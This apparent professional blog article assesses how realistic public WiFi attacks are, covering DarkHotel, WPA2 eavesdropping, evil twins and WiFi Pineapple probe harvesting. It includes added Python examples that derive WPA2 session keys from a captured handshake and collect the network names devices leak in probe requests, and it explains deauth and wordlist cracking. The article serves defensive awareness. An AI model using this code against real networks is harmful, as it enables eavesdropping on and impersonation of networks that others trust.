How to hack WiFi
Gary Hawkins
Views are my own, may be exaggerated for dramatic effect, and subject to change without warning or reason.
The (in)security of public WiFi has been dividing opinions recently so here we'll explore what it actually takes to use WiFi as an attack vector, and what you get for your trouble.
WiFi is a local wireless network, so does the attacker have to be local? Strictly speaking, no. While the radio signals are local, the access point or router is connected to the internet, so it can be compromised from anywhere if it exposes a reachable management interface or a vulnerable service.
The Mirai botnet was built from compromised routers and other consumer IoT devices and was used to take down Dyn's DNS service, and with it a large slice of the web, in October 2016 (Cloudflare article). The BlackTech APT group replace the firmware on compromised edge routers to move through internal corporate networks (joint US and Japanese government advisory, 2023). Neither of these campaigns used control of the router to go after the router's own wireless users.
The DarkHotel APT group used compromised hotel WiFi to deliver malware, as Kaspersky reported in 2014 (research report). While it hasn't been made clear how they initially compromised the hotels, it's reasonable to assume this was remote activity given that they also appeared to have access to check-in information, which is more than the local WiFi network would give them. DarkHotel quickly changed their MO and the technique has rarely been reported since.
This was at a time when around half of web page loads were still plain HTTP, SSL 3.0 was still widely supported (POODLE was disclosed that same year), TLS 1.3 didn't yet exist, and HSTS was in its infancy with less than 1% adoption. Even with all of that in their favour, the attackers used their rogue WiFi only to deliver a malware dropper, something that can be achieved far more easily through well-established methods such as a phishing attachment. There's no indication that they sought to observe or tamper with the web traffic of their targets.
That DarkHotel used kernel-level keyloggers and zero-days, were precise in targeting high-level figures in the nuclear and defence sectors, and had intimate knowledge of travel plans strongly suggests government-backed actors. If an adversarial nation state is genuinely part of your threat model then perhaps don't take advice from social media on how best to protect yourself.
Ok, so remote attacks are possible but not really plausible? It certainly seems that way, so let's focus on local attacks. This introduces challenges for attackers: they need to be physically present. Sure, they could leave behind a drop box of sorts and access that remotely, but that still needs an initial physical presence and leaves behind a physical device. This incurs cost and increases the chances of detection, both things an attacker wants to minimise.
Let's assume I'm ok with those risks. What can I do? You could join an existing WiFi hotspot and eavesdrop on other people using the same hotspot. Both WPA2 and WPA3 give every connected device its own session keys, but on a WPA2-PSK network those keys are derived from the shared passphrase plus values that cross the air in the clear during the 4-way handshake, so anyone who knows the cafe's password and captures your handshake (or forces a fresh one with a spoofed deauthentication frame) can decrypt your traffic. WPA3 (SAE) negotiates the key in an exchange that can't be reproduced from the passphrase, mandates protected management frames that block the deauth trick, and its companion Enhanced Open (OWE) mode encrypts even password-less hotspots, so on WPA3 eavesdropping on your neighbours isn't really feasible. WPA2 is still widely used, though, and a protocol exploit called KRACK (Key Reinstallation AttaCK) was published by researchers in 2017. It hasn't been seen in the wild, probably because the risk/reward doesn't stack up and most devices were patched long ago.
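To make the WPA2-PSK point concrete, here is an added example (not code from the article, and not any real tool's implementation) of the key derivation an eavesdropper performs. Given the shared passphrase, the SSID, both MAC addresses and the two nonces from a captured 4-way handshake, it derives the victim's PTK exactly as the victim does, and confirms the guess by checking the MIC on handshake message 2. The network name, passphrase, MACs, nonces and EAPOL frame are all constructed for the example; the PMK test vector ("password"/"IEEE") is the one published in the IEEE 802.11 standard.

```python
# Added example, not from the article. Why "per-device keys" don't protect you on a
# WPA2-PSK network: anyone with the passphrase plus a handshake capture derives
# the same PTK as the client. All inputs below are constructed.
import hashlib
import hmac
import struct

MIC_OFFSET = 81  # Key MIC field offset within an EAPOL-Key frame (4-byte EAPOL header + 77)


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """IEEE 802.11 PRF-n: concatenated HMAC-SHA1(key, label || 0x00 || data || counter)."""
    out, counter = b"", 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([counter]), hashlib.sha1).digest()
        counter += 1
    return out[:nbytes]


def wpa2_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """48-byte PTK for CCMP: KCK(16) || KEK(16) || TK(16). Only public values besides the PMK."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 48)


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """Key MIC for descriptor version 2 (HMAC-SHA1-128), computed with the MIC field zeroed."""
    zeroed = frame[:MIC_OFFSET] + bytes(16) + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes, kck: bytes) -> bytes:
    """Constructed EAPOL-Key message 2 (client -> AP) carrying SNonce and a valid MIC."""
    rsn_ie = bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # CCMP / PSK
    body = (b"\x02"                      # descriptor type: RSN
            + struct.pack(">H", 0x010a)  # key info: version 2, pairwise, MIC present
            + struct.pack(">H", 0)       # key length (0 in message 2)
            + struct.pack(">Q", 1)       # replay counter
            + snonce + bytes(16) + bytes(8) + bytes(8)  # nonce, IV, RSC, key ID
            + bytes(16)                  # MIC placeholder
            + struct.pack(">H", len(rsn_ie)) + rsn_ie)
    frame = b"\x02\x03" + struct.pack(">H", len(body)) + body  # EAPOL v2, type EAPOL-Key
    return frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + 16:]


def recover_ptk(passphrase, ssid, aa, spa, anonce, msg2):
    """The eavesdropper's step: derive a PTK from a passphrase guess and verify it
    against the captured message-2 MIC. Returns the PTK on success, else None."""
    snonce = msg2[17:49]  # Key Nonce field of the captured frame
    ptk = wpa2_ptk(wpa2_pmk(passphrase, ssid), aa, spa, anonce, snonce)
    ok = hmac.compare_digest(eapol_mic(ptk[:16], msg2), msg2[MIC_OFFSET:MIC_OFFSET + 16])
    return ptk if ok else None


# --- constructed scenario: a coffee-shop WPA2-PSK network with a shared password ---
SSID, PASSPHRASE = "Coffee_Shop_WiFi", "latte2024"
AP_MAC = bytes.fromhex("001122334455")
CLIENT_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))        # fixed rather than random so the run is reproducible
SNONCE = bytes(range(32, 64))


def demo():
    """Returns (attacker derived the victim's PTK, wrong passphrase rejected)."""
    client_ptk = wpa2_ptk(wpa2_pmk(PASSPHRASE, SSID), AP_MAC, CLIENT_MAC, ANONCE, SNONCE)
    msg2 = build_msg2(SNONCE, client_ptk[:16])            # what goes over the air
    attacker_ptk = recover_ptk(PASSPHRASE, SSID, AP_MAC, CLIENT_MAC, ANONCE, msg2)
    wrong = recover_ptk("wrong-guess", SSID, AP_MAC, CLIENT_MAC, ANONCE, msg2)
    return attacker_ptk == client_ptk, wrong is None


if __name__ == "__main__":
    print(demo())
```

The last 16 bytes of the recovered PTK are the temporal key that decrypts the client's CCMP data frames, which is the part that matters to the eavesdropper. The same loop with a wordlist instead of the known passphrase is the offline attack against a captured handshake; on WPA3-SAE the captured exchange gives the guesser nothing to check against.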
You could create a rogue WiFi hotspot, an "evil twin" named something like Coffee_Shop_Free_WiFi, and wait for people to connect. This would allow you not only to eavesdrop but also to manipulate people's activity, such as redirecting web requests. You'll need to deploy your own access point with a power supply (a battery pack buys you hours, not days).
In both cases you're going to be limited by the fact that the vast majority of web traffic is over HTTPS. Eavesdropping shows you which hostnames were visited, because DNS lookups and the TLS SNI field still cross the air in the clear unless the client uses encrypted DNS and ECH, but not much else. Redirecting web requests to a spoofed website is going to throw up Untrusted or Insecure certificate warnings that are quite likely to be noticed, browsers won't even let the user click through them for HSTS sites, and downgrading to plain HTTP (SSL stripping) only works against sites without HSTS and against users who don't notice the missing padlock. You're also limited in that you have no control over who will connect to the hotspot or what they'll do while connected. You're going to be inundated with mountains of worthless junk data belonging to random unknown strangers.
That hardly sounds worthwhile. Can I not target someone specific? Sure you could. We've already assumed that you can be physically proximate with a device and power, so let's turn that access point into a WiFi Pineapple (Hak5's purpose-built rogue AP). You have a target in mind, so you have an idea of their whereabouts. A Pineapple listens for the probe requests in which a device asks by name for networks it remembers, not just public free WiFi but home and office networks as well, and can then mimic one of those known trusted networks so the device connects automagically. Two caveats: modern phones and laptops mostly send wildcard probes and randomise their MAC address, so the trick works best against older devices and against remembered hidden networks; and a cloned WPA2 network only completes the connection if you also know its passphrase (without it you merely capture the device's half of the handshake for offline cracking), whereas a remembered open network, say that airport WiFi, can be cloned outright.
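The harvesting step above is simple enough to show end to end. The following is an added example, not code from the article and not Hak5's Pineapple firmware: it builds a few constructed 802.11 probe request frames, parses the SSID element out of each, and collects the list of remembered networks per client MAC, which is exactly the list a rogue AP then chooses an impersonation target from. Wildcard (empty-SSID) probes are ignored because they reveal nothing, which is why the technique yields little against a modern OS that only probes that way.

```python
# Added example, not from the article. Harvests the "preferred network list" that
# clients leak through directed probe requests. Frames are constructed, not captured.
import struct
from collections import defaultdict

PROBE_REQ_FC = 0x0040          # frame control: type management (0), subtype probe request (4)
TYPE_SUBTYPE_MASK = 0x00fc     # masks out protocol version and flag bits
TAG_SSID, TAG_RATES = 0, 1


def mac_str(mac: bytes) -> str:
    return ":".join(f"{b:02x}" for b in mac)


def build_probe_request(src_mac: bytes, ssid: str) -> bytes:
    """Constructed 802.11 probe request. An empty ssid is a wildcard (broadcast) probe."""
    bcast = b"\xff" * 6
    header = (struct.pack("<HH", PROBE_REQ_FC, 0)   # frame control, duration
              + bcast + src_mac + bcast              # DA, SA, BSSID
              + struct.pack("<H", 0))                # sequence control
    ssid_b = ssid.encode()
    body = bytes([TAG_SSID, len(ssid_b)]) + ssid_b
    body += bytes([TAG_RATES, 4, 0x82, 0x84, 0x8b, 0x96])  # 1, 2, 5.5, 11 Mbps (basic)
    return header + body


def parse_probe_request(frame: bytes):
    """Return (source MAC, requested SSID) for a probe request, else None.
    SSID '' means a wildcard probe. Truncated or malformed tag lists stop parsing."""
    if len(frame) < 24:
        return None
    (fc,) = struct.unpack("<H", frame[:2])
    if fc & TYPE_SUBTYPE_MASK != PROBE_REQ_FC:
        return None
    src = frame[10:16]
    body, pos, ssid = frame[24:], 0, None
    while pos + 2 <= len(body):
        tag, length = body[pos], body[pos + 1]
        value = body[pos + 2:pos + 2 + length]
        if len(value) < length:
            break                                   # element runs past the frame end
        if tag == TAG_SSID:
            ssid = value.decode("utf-8", errors="replace")
        pos += 2 + length
    return (src, ssid) if ssid is not None else None


def harvest_pnl(frames):
    """Map each client MAC (as a string) to the set of SSIDs it asked for by name."""
    pnl = defaultdict(set)
    for frame in frames:
        parsed = parse_probe_request(frame)
        if parsed and parsed[1]:                    # skip non-probes and wildcard probes
            pnl[mac_str(parsed[0])].add(parsed[1])
    return {mac: sorted(ssids) for mac, ssids in pnl.items()}


# --- constructed capture: an older laptop that probes by name, and a modern phone ---
OLD_LAPTOP = bytes.fromhex("a4b1c2d3e4f5")
NEW_PHONE = bytes.fromhex("0a1b2c3d4e5f")          # locally administered (randomised) MAC
CAPTURE = [
    build_probe_request(OLD_LAPTOP, "HomeNet-5G"),
    build_probe_request(OLD_LAPTOP, "ACME-Corp"),
    build_probe_request(OLD_LAPTOP, "Airport_Free_WiFi"),
    build_probe_request(OLD_LAPTOP, ""),
    build_probe_request(NEW_PHONE, ""),              # wildcard only: reveals nothing
]


def demo():
    return harvest_pnl(CAPTURE)


if __name__ == "__main__":
    for mac, ssids in demo().items():
        print(mac, ssids)
```

Of the three names the laptop leaks, only Airport_Free_WiFi is an open network that can be cloned without further work; the home and office SSIDs would need their passphrases before the device would complete a connection to the impostor.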
You still need to overcome the HTTPS problem, but maybe the metadata is intrinsically more valuable when it's tied to a known person. Or you can be more cunning with the spoofed redirects, knowing your intended victim.
Would a VPN help protect people against any of this? Maybe. Maybe not. A VPN connects your device to a remote gateway, but it can't reach that gateway until it has a network connection, so the VPN needs to be suspended in order to first connect to the WiFi, doubly so if there's a sign-in portal, so there's a window of opportunity that can be exploited. Background services like app updaters will routinely call home as soon as they detect a network connection (DarkHotel used a malicious Adobe update package).
Even omitting that initial window of opportunity, it depends on the configuration of the VPN whether it blocks local network traffic, routes DNS queries through the tunnel, and fails closed (a "kill switch") if the tunnel drops. For corporate devices this is likely managed by (assumed) competent IT administrators, but it is not a trivial undertaking for your average computer user. With all that in mind, if mere knowledge of the nature of the websites you're visiting is likely to be detrimental then perhaps consult a lawyer instead of LinkedIn.
So in a nutshell, if you're worried about being compromised over WiFi, your best defence is to avoid using known, trusted hotspots, or at least to stop your device joining them automatically. The techniques and risks are just the same for an attacker, but the payoff is substantially higher, making impersonation of a network you trust the more plausible scenario. If you think all of this is still a viable concern and you want to keep safe by only using tethered mobile data, don't look up Stingray cell-site simulators.
PCI QSA | PCI QPA | CCSP | CISSP | CISA | CISM | CEH | Azure Security engineer | AWS Solutions Architect | GCP security | Oracle certified programmer
1 year ago: Very well written. I am kind of habituated to use airport WiFi (at least overseas airports, when mobile data is not an option). Though I strictly do not manage any sensitive information while using airport WiFi, I do agree with you. The attacker can create an evil twin network. Probably, we can disable the Auto connect feature when connecting to some free hotspots. A few airports require us to register the mobile device and enter an OTP before we get Internet access. Is it considered lower risk than free WiFi?